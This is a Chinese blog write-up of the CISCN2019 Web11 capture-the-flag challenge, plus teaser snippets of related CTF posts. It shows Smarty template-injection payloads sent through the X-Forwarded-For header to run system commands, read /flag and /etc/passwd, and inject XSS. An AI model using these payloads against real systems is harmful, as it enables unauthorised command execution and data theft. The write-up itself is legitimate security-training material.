代码编织梦想

打开环境:

 发现Build With Smarty !说明应该是与ssti模板注入有关。

 

 发现xff,还有右上角的Current IP:139.205.239.33,就尝试伪造一下IP:

 成功伪造,那就看看xff这个地方有无ssti注入漏洞:

 服务端模板注入攻击

 说明存在ssti注入漏洞,且为twig类型,我们试试能不能命令执行:

 成功执行了,那就简单了,当前目录下有

api
css
index.php
smarty
templates_c
xff
xff

分别读取:X-Forwarded-For:{system(‘cat /api’)}
X-Forwarded-For:{system(‘cat /css’)}
X-Forwarded-For:{system(‘cat /index.php’)}
X-Forwarded-For:{system(‘cat /smarty’)}
X-Forwarded-For:{system(‘cat /templates_c’)}
X-Forwarded-For:{system(‘cat /xff’)}
X-Forwarded-For:{system(‘cat /flag’)}
X-Forwarded-For:{system(‘cat /flag.php’)}

都没发现内容,那就看看根目录:

发现了flag,读取:

另外发现{$smarty.version},返回版本信息3.1.30,if标签能用

smarty中的{if}标签中也可以执行php语句,得flag:{if readfile('/flag')}{/if}

smarty中还有{literal}、{php}(smarty 2可用),试试{literal}或许还有别的解题思路。

{literal}可以让块中间的内容忽略Smarty的解析,paylaod: {literal}alert('xss');{/literal} 可以产生 xss

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52907838/article/details/119253980

ciscn2019 华东南赛区线下赛web第一题-爱代码爱编程

题目过滤了union 和大量的sql函数,本意是想让人读文件,当时心太急了没做出来,现在复习一下,脚本很简单,利用的是ascii的字符串比较 如 select load_file('/flag')>='A' selec

[ciscn2019 华北赛区 day1 web1]dropbox-爱代码爱编程

知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的

[CISCN2019 华东北赛区]Web2 WriteUp-爱代码爱编程

[CISCN2019 华东北赛区]Web2 WriteUp 前言一.打开环境二.构造XSS代码 前言 这是一道xss结合sql注入的题目,当时在写的时候想了很久,最后看大佬的题解觉得不太适合我这样的新手来看,于是心血来潮想写一篇小白向的WriteUp。 一.打开环境 发现是一个网站,有投稿和反馈功能。这个比较重要。 我们很容易想到,可以

[CISCN2019 华东南赛区]Web4-爱代码爱编程

[CISCN2019 华东南赛区]Web4 进入环境,只有一个链接,点进去是百度 但是这个url似乎暴露了些什么http://8c38a640-615b-48e3-9cf7-a6c197cd2ab8.node3.buuoj.cn/read?url=https://baidu.com,分别试一下url=/etc/passwd url=file:///etc

[CISCN2019 华东南赛区]Web11 1-爱代码爱编程

打开环境 右上角有ip地址 提示中有xff 我就猜想会不会存在模板注入 这里给一些smarty积累的payload {system('cat /flag')} {self::getStreamVariable("file:///etc/passwd")} {Smarty_Internal_Write_File::writeFile($SCRIPT_NA

BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入-爱代码爱编程

BUUCTF之[CISCN2019 华东南赛区]Web11 知识点 SSTIsmartyX-Forwarded-For题目 于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1 emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTI和smarty这两个词。心想,这个不是最近才做过类似的题